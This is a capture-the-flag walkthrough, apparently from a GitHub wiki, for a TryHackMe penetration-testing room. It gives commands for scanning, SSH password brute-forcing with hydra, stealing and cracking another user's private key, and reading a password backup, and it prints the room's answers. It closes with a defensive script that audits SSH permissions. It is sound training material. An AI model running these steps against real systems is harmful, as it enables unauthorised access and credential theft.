THM Basic Pentesting - grunt92/IT-Sec-WriteUps GitHub Wiki

Web App Testing and Privilege Escalation

Deploy the machine and connect to our network

No answer needed

Find the services exposed by the machine

Run nmap -A -p- IP.

No answer needed

What is the name of the hidden directory on the web server (enter name without /)?

Run gobuster dir --url http://IP -w /Path/To/Textfile.txt.

development

User brute-forcing to find the username & password

Look into the development directory and check the text files. The "j.txt" file hints that the password of the "j" user is weak. Run enum4linux IP and you will get two users, "jan" and "kay". Knowing that "j" has a weak password, run hydra -l jan -P /path/to/textfile.txt IP ssh and you will get jan's password after a short while.

No answer needed

What is the username?

jan

What is the password?

armando

What service do you use to access the server (answer in abbreviation in all caps)?

SSH

Enumerate the machine to find any vectors for privilege escalation

No answer needed

What is the name of the other user you found (all lower case)?

kay

If you have found another user, what can you do with this information?

Check the home directories of the other users and what rights you have on them by running ls -la; you will see that you are allowed to read the contents of "/home/kay/.ssh". Change into "/home/kay/.ssh", start a Python web server with python3 -m http.server PORT, and download the key on your local machine with wget IP:PORT/id_rsa. Run ssh2john id_rsa > hash.txt and john --wordlist=/Path/To/File.txt hash.txt to crack the passphrase of kay's private key. Run ssh -i id_rsa IP and enter the passphrase "beeswax" to establish an SSH connection to the server. Note: alternatively you can copy an enumeration tool such as linpeas to the "/tmp" directory and execute it with sh /tmp/tool. linpeas will also find kay's id_rsa.

No answer needed
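The escalation above only works because kay's .ssh directory and private key are readable by other local users, which sshd's StrictModes would normally refuse for the key owner but does nothing to stop a neighbour from reading. As an added defensive check (my own example, not part of the original writeup or the room), this Python script audits every .ssh directory under a home root for group- or world-accessible private material; the user names and file layout in build_demo are constructed for the demo.

```python
import os
import stat
import tempfile

# Files in ~/.ssh that may legitimately be world-readable; anything else
# (id_rsa, id_ed25519, ...) is treated as private key material.
PUBLIC_NAMES = {"authorized_keys", "known_hosts", "config"}
GROUP_OTHER_RW = stat.S_IRWXG | stat.S_IRWXO
GROUP_OTHER_W = stat.S_IWGRP | stat.S_IWOTH

def audit_ssh_dirs(home_root):
    """Walk home_root/*/.ssh and return (path, mode) pairs whose permission
    bits let other local users read a private key or tamper with the dir."""
    findings = []
    for user in sorted(os.listdir(home_root)):
        ssh_dir = os.path.join(home_root, user, ".ssh")
        if not os.path.isdir(ssh_dir):
            continue
        dir_mode = os.lstat(ssh_dir).st_mode
        if dir_mode & GROUP_OTHER_RW:           # expected 0700
            findings.append((ssh_dir, stat.S_IMODE(dir_mode)))
        for name in sorted(os.listdir(ssh_dir)):
            path = os.path.join(ssh_dir, name)
            mode = os.lstat(path).st_mode
            if not stat.S_ISREG(mode):          # skip symlinks, sockets, subdirs
                continue
            is_public = name in PUBLIC_NAMES or name.endswith(".pub")
            bad_bits = GROUP_OTHER_W if is_public else GROUP_OTHER_RW
            if mode & bad_bits:
                findings.append((path, stat.S_IMODE(mode)))
    return findings

def build_demo(root):
    """Constructed layout, not the real machine: 'kay' has a world-readable
    .ssh directory and key (the misconfiguration above); 'jan' is correct."""
    for user, dir_mode, key_mode in (("kay", 0o755, 0o644), ("jan", 0o700, 0o600)):
        ssh_dir = os.path.join(root, user, ".ssh")
        os.makedirs(ssh_dir)
        key = os.path.join(ssh_dir, "id_rsa")
        with open(key, "w") as fh:
            fh.write("-----BEGIN OPENSSH PRIVATE KEY-----\nCONSTRUCTED\n")
        os.chmod(key, key_mode)
        os.chmod(ssh_dir, dir_mode)

def run_demo():
    """Build the sample tree in a temp dir and return findings relative to it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_demo(tmp)
        return [(os.path.relpath(p, tmp), m) for p, m in audit_ssh_dirs(tmp)]
```

Call audit_ssh_dirs("/home") on a real host to list the offending paths; run_demo() returns the two findings for the constructed tree (kay's directory at 0755 and key at 0644).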

What is the final password you obtain?

Run cat /home/kay/pass.bak

heresareallystrongpasswordthatfollowsthepasswordpolicy$$